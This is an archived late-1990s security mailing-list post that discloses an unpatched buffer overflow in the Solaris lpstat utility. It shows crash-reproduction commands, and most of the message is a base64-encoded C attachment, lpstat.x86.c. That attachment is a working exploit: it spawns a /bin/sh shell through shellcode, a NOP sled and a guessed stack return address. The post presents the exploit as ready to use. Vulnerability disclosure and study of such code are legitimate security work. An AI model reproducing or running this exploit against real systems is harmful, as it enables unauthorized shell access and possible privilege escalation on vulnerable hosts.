This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. ---559023410-851401618-917362967=:548 Content-Type: TEXT/PLAIN; charset=US-ASCII On Aug/25/98 Sun released the following patches for lp: Solaris2.6 Sparc: 106235-02 Solaris2.6 x86: 106236 It is quite sad, that they did not fix another overflow in /usr/bin/lpstat. I testified this bug on either Solaris 2.7 x86 and 2.6 Sparc, I assume that it is also present on Solaris 2.6 x86 and 2.7 Sparc. Solaris 2.7 x86 % plasmoid@gorkie:foo> lpstat -c `perl -e 'print "A" x 998'` % UX:lpstat: ERROR: Class [...] % AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does % not exist. % TO FIX: Use the "lpstat -c all" command to list % all known classes. % Segmentation Fault % plasmoid@gorkie:foo> Solaris 2.6 Sparc % plasmoid@bock:foo> lpstat -c `perl -e 'print "AAAA" x 250'` % UX:lpstat: ERROR: Class [...] % AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does not % exist. % TO FIX: Use the "lpstat -c all" command to list % all known classes. % Segmentation Fault % plasmoid@bock:foo> This overflow is definitly exploitable, i attached the exploit for Solaris x86. Quality patches for all Solaris versions can be obtained from www.hert.org, a fast security source. plasmoid deep/thc/clb http://thc.inferno.tusculum.edu ---559023410-851401618-917362967=:548 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="lpstat.x86.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.GSO.4.05.9901261502470.548@gorkie> Content-Description: Content-Disposition: attachment; filename="lpstat.x86.c" LyoNCiAqIGxwc3RhdCBzcGxvaXQgZm9yIHNvbGFyaXMgMi42LzIuNw0KICog YnkgcGxhc21vaWQvZGVlcC90aGMgPHBsYXNtb2lkQHBpbW1lbC5jb20+IChj KSAxOTk5DQogKiBzdXBwb3J0ZWQgYnkgaW5zZWN0ZWQgYW5kIHdpbGtpbnMN CiAqIA0KICogVEhDIC0gVGhlIEhhY2tlcidzIENob2ljZQ0KICogaHR0cDov L3RoYy5pbmZlcm5vLnR1c2N1bHVtLmVkdQ0KICovIA0KDQoNCg0KI2luY2x1 ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8 c3RkbGliLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQoNCg0KY2hhciBzaGVs bFtdID0NCiAiXHhlYlx4NDhceDlhXHhmZlx4ZmZceGZmXHhmZlx4MDdceGZm XHhjM1x4NWVceDMxXHhjMFx4ODlceDQ2XHhiNCINCiAiXHg4OFx4NDZceGI5 XHg4OFx4NDZceDA3XHg4OVx4NDZceDBjXHgzMVx4YzBceDUwXHhiMFx4OGRc eGU4XHhkZiINCiAiXHhmZlx4ZmZceGZmXHg4M1x4YzRceDA0XHgzMVx4YzBc eDUwXHhiMFx4MTdceGU4XHhkMlx4ZmZceGZmXHhmZiIgIA0KICJceDgzXHhj NFx4MDRceDMxXHhjMFx4NTBceDhkXHg1ZVx4MDhceDUzXHg4ZFx4MWVceDg5 XHg1ZVx4MDhceDUzIg0KICJceGIwXHgzYlx4ZThceGJiXHhmZlx4ZmZceGZm XHg4M1x4YzRceDBjXHhlOFx4YmJceGZmXHhmZlx4ZmZceDJmIg0KICJceDYy XHg2OVx4NmVceDJmXHg3M1x4NjhceGZmXHhmZlx4ZmZceGZmXHhmZlx4ZmZc eGZmXHhmZlx4ZmYiOyANCg0KY29uc3QgaW50IGJ1ZmZlcnNpemU9MTEwMDsN CmNvbnN0IGNoYXIgeDg2X25vcD0weDkwOw0KbG9uZyBub3AsZXNwOw0KbG9u ZyBvZmZzZXQ9MDsNCmNoYXIgYnVmZmVyWzIwMDBdOw0KDQpsb25nIGdldF9l c3AoKSB7IF9fYXNtX18oIm1vdmwgJWVzcCwlZWF4Iik7IH0NCg0KaW50IG1h aW4gKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgaTsNCiAg ICANCiAgICAvKiB5b3Ugc2hvdWxkbid0IGVkaXQgdGhlIG9mZnNldCwgd2Ug cnVuIHdpdGgNCiAgICAgICA4MDAgbm9wcyBpbiAxMTAwIGJ5dGVzIGJ1ZmZl ciwgb25lIG9mIHRob3NlDQogICAgICAgbm9wcyBzaG91bGQgYmUgaGl0ICov DQogICAgDQogICAgaWYgKGFyZ2MgPiAxKSBvZmZzZXQgPSBzdHJ0b2woYXJn dlsxXSwgTlVMTCwgMCk7DQoNCiAgICAvKiBpZiB5b3UgZG9uJ3Qgc3VjY2Vl ZCwgbW9kaWZ5IHRoZSBub3AgY291bnQsIA0KICAgICAgIHRoZSBzdGFuZGFy dCB2YWx1ZSBvZiA4MDEgYnlidGVzIGlzIHF1aXRlDQogICAgICAgc3RyYW5n ZSBlbnVmZiAqLw0KICAgICAgIA0KICAgIGlmIChhcmdjID4gMikgbm9wID0g c3RydG91bChhcmd2WzJdLCBOVUxMLCAwKTsNCiAgICBlbHNlDQogICAgICAg IG5vcCA9IDgwMTsNCg0KICAgIGVzcCA9IGdldF9lc3AoKTsNCg0KICAgIG1l bXNldChidWZmZXIsIHg4Nl9ub3AsIGJ1ZmZlcnNpemUpOw0KICAgIG1lbWNw eShidWZmZXIrbm9wLCBzaGVsbCwgc3RybGVuKHNoZWxsKSk7DQogICAgZm9y IChpID0gbm9wK3N0cmxlbihzaGVsbCk7IGkgPCBidWZmZXJzaXplLTQ7IGkg Kz0gNCkNCiAgICAgICAgKigoaW50ICopICZidWZmZXJbaV0pID0gZXNwK29m ZnNldDsNCg0KICAgIGV4ZWNsKCIvdXNyL2Jpbi9scHN0YXQiLCAibHBzdGF0 IiwgIi1jIiwgYnVmZmVyLCBOVUxMKTsNCg0KICAgIHByaW50ZigiZXhlYyBm YWlsZWQhXG4iKTsNCiAgICByZXR1cm4gMDsNCn0NCg== ---559023410-851401618-917362967=:548--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:31:15 PDT